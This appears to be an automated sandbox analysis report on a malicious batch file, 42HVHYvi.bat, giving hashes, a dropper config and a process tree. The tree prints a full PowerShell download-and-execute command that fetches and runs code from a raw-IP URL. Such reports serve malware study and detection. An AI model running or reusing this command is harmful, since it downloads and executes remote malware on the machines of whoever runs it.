Analysis
  max time kernel: 100s
  max time network: 99s
  platform: windows10_x64
  resource: win10v200213
  submitted: 18-02-2020 01:10
Static task: static1

Behavioral task: behavioral1
  Sample: 42HVHYvi.bat
  Resource: win7v200213 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 42HVHYvi.bat
  Resource: win10v200213 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 42HVHYvi.bat
  Size: 192B
  MD5: a9075a0e43612a388eda0d4643037a34
  SHA1: 6bfb53b342e2518e07955676e5a8f18717970504
  SHA256: 811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
  SHA512: 9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source:   ps1.dropper
    URLs:     http://185.103.242.78/pastes/42HVHYvi
Signatures

  Program crash (1 IoC)
    Processes:
      pid   pid_target  process       target process
      3084  4000        WerFault.exe  powershell.exe

  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    Processes:
      description                pid   process
      Token: SeRestorePrivilege  3084  WerFault.exe
      Token: SeBackupPrivilege   3084  WerFault.exe
      Token: SeDebugPrivilege    3084  WerFault.exe

  Suspicious behavior: EnumeratesProcesses (14 IoCs)
    Processes:
      pid   process
      3084  WerFault.exe   (14 identical entries)
Processes (tree, indented by depth)

  1. C:\Windows\system32\cmd.exe (PID 3964)
     Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"

     2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4000)
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"

        3. C:\Windows\SysWOW64\WerFault.exe (PID 3084)
           Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 704
           Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses